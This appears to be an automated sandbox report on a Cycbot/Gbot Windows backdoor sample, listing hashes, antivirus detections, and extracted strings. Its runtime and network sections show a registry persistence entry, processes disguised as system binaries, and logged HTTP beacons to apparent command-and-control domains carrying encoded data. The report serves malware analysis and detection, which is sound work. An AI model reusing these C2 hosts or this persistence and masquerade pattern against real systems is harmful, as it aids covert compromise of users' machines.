Analysis Date2014-11-21 09:43:28
MD5f7b03627730c05ad34711042dc8a2575
SHA1ae12d99fd9438c109eba12bb66caaf9d02e7369d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 2c8a27e06e9f01f7f857a2e1ecb1e27d sha1: ec9046c2963128e8026e4861e8b86ab791aba474 size: 109568
Section.rdata md5: f22545caaf6932c9d4fb37c1a25e80e5 sha1: 169197b93962d57419266712b7398e01d904c062 size: 1024
Section.data md5: 2a534553cea90759e18c829440d8f777 sha1: ddf7a3afa84e9bf2bee5b74823654c6863a5b60d size: 54784
Section.apexi md5: a24195d0cc9d2f0e7a622aca79e7051f sha1: 04dc024b2cc4ff5df51ccd0cd1ae452d894883ae size: 1024
Timestamp2005-09-12 06:27:21
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1520
PEhashfb80925a20301a0478da91e777f975904e96e46e
IMPhashd0428affb5a34dc8bb398555e7302481
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.G.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-1240
AVDr. WebBackDoor.Gbot.21
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Cycbot.AF
AVFortinetW32/Gbot.B!tr.bdr
AVFrisk (f-prot)W32/Goolbot.G.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Win32/Heri
AVIkarusBackdoor.Win32.Gbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)Trojan.Jorik.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSpdadatarestore.com
Winsock DNS127.0.0.1
Winsock DNSrealsoftwaredevelopment.com
Winsock DNShostinganddedic.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrealsoftwaredevelopment.com
Type: A
104.28.9.83
DNSrealsoftwaredevelopment.com
Type: A
104.28.8.83
DNSzonetf.com
Type: A
141.8.225.80
DNSzonetf.com
Type: A
141.8.225.80
DNShostinganddedic.com
Type: A
DNSpdadatarestore.com
Type: A
HTTP GEThttp://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v75=22&tq=gKZEtzyd6jYfK2dVTdhZWnLFWaW1NanPeNdBL9pKo%2Bg8PQOAWGOa%2BoYutXZEevJIYy5VcirzjundIRLIB4jiTj5XGNvaXPKiuCRzPkXeU8VLbB7285I4%2BeZIKF%2BBfCTmIGOjLKUVkxRNyoHRvRmklieIfHxAePMaOFXt5dLg5TErzOXiCKlvy2wevbug9%2FcIpJVa%2FljF9qVuI7RversgMk4VhJdnias4%2FYvxGqFOXAtdY2gCp7k%2FayeycYof2ojw57O620YCubzAKIqjND0VGpJ%2FKS0Qhwq6A6a%2B3KFqsEQgI5YYwLFo3RiES9sBM8oe7d6Ey20N4DsE5RRr8a%2FDVyQHch16dSGiRsXVN%2BMz6gu0FX%2BkX6JrIT8SQI6D%2B7sQsuY3
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxL5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 104.28.9.83:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap

Strings
T0
..y7
.....
.
.E...o....B=..U..0...t..)...1..U
$.S
.W
.G....
F.
E..z
..
..W..'k....@.Alr...c.
_'
.
.x
.
...
.R...ef...k...5
.'I.
_
&
.
031Bq
040904b0
0sWV
1.0.0.3
1520
!DPS
FFV0
FileVersion
jjjjjj
p2P;
PrivateBuild
ProductVersion
`r`E
!sqc
StringFileInfo
`sWQ
TIMES NEW ROMAN
Translation
U`b`
VarFileInfo
VS_VERSION_INFO
03!8GR
0FgB*o
0jd%	'
0n@n>G
4 ,K>	
4"s94W
597`qE
5}Vr]5
)6hO-Q
@6#%v;
77]A]2WL
=8{<e<
8E?Dk@
8-}gzA
8IJZ&^
,\.8`Z
9',(3^
_95kDv
+$[<#a
A)bFx;
.apexi
 =aRxm
>!.c1H
C+GzpY
CheckRemoteDebuggerPresent
CreateWindowExW
CT=fK6
CtSG/"
C_V[uQ
"-<D3'3
@.data
DocumentPropertiesW
d+Zmup
EndDialog
EnumResourceTypesW
ER')EV
Eyf.&nH
f*"/}$
F)80OJc
\Fdd$t\
*fH/ve
fI	?<y
[\FSi;
GetAncestor
GetFileType
GetStartupInfoA
GetWindowInfo
GSjhRrM
huCPVG?#
IAmI,1Kd
'IkEq-
|imp.X
#In!??
InitializeCriticalSection
i%_o%1
I"@"+<t
IWT+"yGw
<j	+{&
_,j/[ 
j}fKe:
JI5-p4
J_im5Q
,)jnhR
J{Op;u
.k*AOz
KERNEL32.dll
;kmh{P
k\yxep
L*Mbjlua
LoadCursorW
lstrcpynW
+/<LT3v
ly-}'c
MessageBoxW
m[MwhV
@Mv.Sb
/mx'/[eL
,mZ-{OL
N9FV-~
Njumu"
N?k%8B
Nl28Lzi 2
o0P}e	
O$!:H&?]|1
oh^;`y
|OJsR<M*oO
@o	N|M
{Oq,WA
<o,Y}Hl8
p6KoK4
p8=Y6<
`_}`Pf
pRW;~<
QmU;(o
rAYW_qp
`.rdata
RegisterClassExW
R`GO"Q
!|rUP?5
rXMtZ,1:
S$'})5l
'$SD\A
*s!EbP
sG6k9B>~<:
Sk><ni
sl$~:E
SMX!{lQ
<s="ur
Te3oI<
teyrkK/
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T:oR7{
u_0KTCG
udIN6i
u-]}=E
USER32.dll
,<U$xHF
_vRy_&
vwhu0Fh
(W)~htr
WINSPOOL.DRV
W?LT<^
<-\'?)wP
wtoALAmI,
X-2]@-{9jmc
X2Gf*~
X.&('A
XLN]yGH
XLr{h1
Y4O$%"
ydh|Vn
(Y}~u>kP
*zj4q+
zkCX+>